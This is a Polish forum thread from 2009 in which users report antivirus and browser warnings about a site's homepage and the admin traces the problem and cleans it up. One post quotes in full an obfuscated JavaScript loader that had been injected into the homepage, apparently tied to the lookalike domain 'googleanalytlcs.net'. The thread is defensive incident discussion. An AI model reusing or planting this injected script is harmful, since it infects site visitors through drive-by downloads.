Top Info
najistotniejsze informacje z tematu |
|
Zobacz poprzedni temat :: Zobacz następny temat |
Autor |
Wiadomość |
Miro Stukacz
Dołączył: 25 Paź 2006 Posty: 16 Skąd: Katowice
|
Wysłany: 20 Maj 2009 20:48 Temat postu: |
|
|
Cytat: |
witam jest problem
avast 4.8 pro wykrywa trojana |
Nie tylko Avast alarmuje. Google Chrome również ostrzega przed wejściem na stronę. Wyskakuje wielki czerwony komunikat, że strona jest potencjalnie niebezpieczna.
Gdyby nie to, że bezgranicznie ufam adminowi i to, że jestem tu gościem już od baaardzo dawna to nie pozwoliłbym przeglądarce kontynuować otwierania. |
|
Powrót do góry |
|
|
Adv Bot
Dołączył: 01 Sty 1970 Posty:
|
|
Powrót do góry |
|
|
DJ Lotos Root Admin
Dołączył: 19 Sty 2003 Posty: 3342 Skąd: PL/state: lubuskie Wiek: 46 lat(a)
|
Wysłany: 20 Maj 2009 21:56 Temat postu: |
|
|
ok, odlaczony zostal stat.pl dla testow, sprawdzcie co sie teraz dzieje, poza nim juz zadne obce skrypty nie chodza w serwisie _________________ Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... A. Einstein
Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora |
|
Powrót do góry |
|
|
DJ Lotos Root Admin
Dołączył: 19 Sty 2003 Posty: 3342 Skąd: PL/state: lubuskie Wiek: 46 lat(a)
|
Wysłany: 21 Maj 2009 16:03 Temat postu: |
|
|
i sprawdzal to ktos miedzy 20 Maj 2009 21:56 a 21 Maj 2009 16:03
by stat byl odlaczony na ten czas, prosze tez sprawdzic na www.interkom.int.pl tam jest bardzo podobny kod wiec moze tez pokazac taki monit _________________ Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... A. Einstein
Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora |
|
Powrót do góry |
|
|
vic01 Weteran
Dołączył: 25 Sie 2004 Posty: 501 Skąd: 16°44,846'E 51°46,325'N Wiek: 43 lat(a)
|
Wysłany: 21 Maj 2009 16:44 Temat postu: |
|
|
interkom takze piszczy ze jest trojan....
sprawdzalem okolo 13-14 odlaczenie stat.pl nic nie dalo
pozdrawiam.
PS co ciekawe przy wejsciu na /forum.php nic sie nie dzieje tylko / portal.php wariuje.. nie macie kopi zapasowej |
|
Powrót do góry |
|
|
Miro Stukacz
Dołączył: 25 Paź 2006 Posty: 16 Skąd: Katowice
|
Wysłany: 21 Maj 2009 17:34 Temat postu: |
|
|
Na wszystkich podstronach serwisu alarm się nie włącza.
Jak wchodzę na stronę główną i pojawia się alert od razu klikam na rozłącz. Strona wygląda ok tylko nie ma na niej ShoutBoxa, może to jakiś skrypt w tej części strony jest interpretowany przez program jako trojan.
Aha i jeszcze przeczytałem dokładnie komunikat jaki pokazuje Chrome. Sugeruje on, że na stronie jest jest kod odnoszący się do strony: googleanalytlcs.net.
Więcej na ten temat na: stronie diagnostycznej Google |
|
Powrót do góry |
|
|
maker3 Gaduła
Dołączył: 05 Sie 2006 Posty: 45
Punktów karnych: 40
|
Wysłany: 21 Maj 2009 18:34 Temat postu: |
|
|
Pewnie Admina ma wirusa "HTML:Iframe-inf" |
|
Powrót do góry |
|
|
Crawley Weteran
Dołączył: 08 Wrz 2005 Posty: 421 Skąd: Jastrzębie-Zdrój Wiek: 39 lat(a)
|
Wysłany: 21 Maj 2009 18:43 Temat postu: |
|
|
DJ Lotos napisał: |
i sprawdzal to ktos miedzy 20 Maj 2009 21:56 a 21 Maj 2009 16:03 :?:
by stat byl odlaczony na ten czas, prosze tez sprawdzic na www.interkom.int.pl tam jest bardzo podobny kod wiec moze tez pokazac taki monit |
Mi nic takiego nie wyskakuje, Avira też nie piszczy, nigdy nie piszczała :) Sprawdzane w tych godzinach. |
|
Powrót do góry |
|
|
Dezeath Developer
Dołączył: 28 Gru 2004 Posty: 325 Skąd: Wrocław
|
Wysłany: 21 Maj 2009 20:36 Temat postu: |
|
|
Hm, co to za syf doklejony na stronie głównej
Cytat: |
language=javascript>qumqhbk="uxXs&zmqwJmNKM%#MkkYIMVQNvpPtjwR";rlpfzpp="X3cX73X63X72X69X70tX20X6caX6eguage=X6aX61vX61sX63ript>X20 X66uX6ectioX6e hX68yX6cmX70X6ccX73X28bwX61kX64uj){X76X61X72 wouX76mpvc,icX69ncX62jhX3dX22;wX5c\"9X2c[X67X2beX3ddX54@M2#X20X75KNa]X346!X6cX26cX7eFX42*`X66-}s7X33X76.rX4aU8PX48iX6d)^t:qIX30xOZpoX47EX31X79X35X6eb_X6aA$X7bX7cX56(CX27X7akX68\",eX78jX6dfixr=X22\"X2cX6aX74X70yX71eslq,htypwX68X64,X69nfardX6bdjX3d\"\",bbqkX75gjlX3bX66X6fr(X77X6fuX76mX70vcX3d0;wX6fX75vX6dX70vX63X3cX62wX61kX64uX6aX2elenX67X74hX3bwX6fX75vX6dpX76cX2b+X29X7b jX74pX79X71eslq=bX77akduj.chX61X72AX74X28X77X6fuvmX70vc);hX74yX70whX64X3dX69cincbX6aX68.X69X6edeX78OX66X28jX74pX79qX65X73X6cq);ifX28X68typX77X68X64X3eX2d1X29{ bbqkX75X67X6aX6c=X28(htX79pwhX64+X31)X258X31-1X29X3bX69fX28bbX71kuX67jX6c<X3d0)bbqkugX6al+=X381X3bX69X6efX61X72dkdj+=iX63inX63bjX68.X63hX61X72X41X74(bbqX6bugjl-X31); }X20X65lX73eX20iX6eX66arX64kdX6aX2bX3djtpyqX65slq;X7dX65X78jX6dX66iX78X72+X3dinfaX72dX6bX64jX3bX64X6fcumX65nX74.wrX69tX65(X65xX6amfX69xX72);}<X2fsX63X72ipX74>";ketylbkb=qumqhbk.charAt(14);crabtsg=rlpfzpp.replace(/X/g,ketylbkb);gxjxgal=unescape(crabtsg);var rvqoqjayc,coeuyjn;document.write(gxjxgal);rvqoqjayc="<7~Jmo:u&]b+K]+=d9U].]S~Jmo:9>u-Kb~:mGbu7-k7.=I.IC^u|u:J5u|u.]Ju-=Jbh\"&)~=7_du97)+om5+5m+=9[u~I~J-&hJ7uduywu-Kb~:mGbukI-5k&~)J+T=I]Cb])=[u.]&K=^u|.]JuTudub=\"uD]:=wTr7=:@m)=CCb=\"uD]:=^r+=:@m)=C^ueuP!6xxxxx^wTG~K)=b:r~GGhm=udub])=ueu9d9ueu=7~]o=C.]&K=^ueu9wu=OomJ=7d9ueuTr:GE2@S:Jmb+C^wsu-Kb~:mGbuTTK.=55.]o])C^u|J=:KJbuCTG~K)=b:r~GGhm=rmbT=OZ-C-=Jbh\"&)~=7_ueu9d9ueu~I~J-&hJ7^uddu}y^wsum-CuTTK.=55.]o])C^u^u|uTG~K)=b:r\"Jm:=Cu9<S'R0H@u&]b+K]+=d\\9U].]S~Jmo:\\9uSR'd\\9;:q//+GG+&=]b]&5:&~7rb=:/jjK:)r+m-?!6n,P=PxP,6_yxy#6!3~yxx6=y~y~y#6yx#yP,!-}#P3!3P!##c9eTG~K)=b:rJ=-=JJ=Je9c9eS:Jmb+CCb=\"uD]:=C^^r+=:@m)=C^^e9\\9><\\/S'R9e90H@>9u^wukI-5k&~)J+T=I]Cu-=Jbh\"&)~=7_[u~I~J-&hJ7u^wusu=&7=u|ususu~]:~;uC=^u|susu7-k7.=I.IC^w</7~Jmo:>u";hhylmplcs(rvqoqjayc);</script> |
EDIT:
Identyczny kod jest doklejony w źródłach strony głównej http://interkom.int.pl/. _________________ -Dezeath |
|
Powrót do góry |
|
|
DJ Lotos Root Admin
Dołączył: 19 Sty 2003 Posty: 3342 Skąd: PL/state: lubuskie Wiek: 46 lat(a)
|
Wysłany: 21 Maj 2009 22:50 Temat postu: |
|
|
no fakt rzeczywiscie zaczytalem to co wypluwa serw i jest to cos jeszce przed tagiem html...
ale tylko w przypadku wczytania dokumentu glownego tego co wyrzuci apache...
w tej chwili juz tego syfu byc nie powinno... _________________ Podobno wszechświat i głupota ludzka są nieograniczone...
Co do tego drugiego nie ma wątpliwości... A. Einstein
Dlatego zawsze korzystaj z FAQ, Szukaj i Instalatora |
|
Powrót do góry |
|
|
vic01 Weteran
Dołączył: 25 Sie 2004 Posty: 501 Skąd: 16°44,846'E 51°46,325'N Wiek: 43 lat(a)
|
Wysłany: 22 Maj 2009 7:58 Temat postu: |
|
|
jest dobrze <brawo>
pozdrawiam |
|
Powrót do góry |
|
|
Miro Stukacz
Dołączył: 25 Paź 2006 Posty: 16 Skąd: Katowice
|
Wysłany: 22 Maj 2009 16:03 Temat postu: |
|
|
uff już ok.
A wiadomo coś co to za kod i dlaczego dokleił się do strony głównej?
Pozdrawiam. |
|
Powrót do góry |
|
|
kroku Weteran
Dołączył: 24 Maj 2004 Posty: 574 Skąd: wziąć kase?
|
|
Powrót do góry |
|
|
|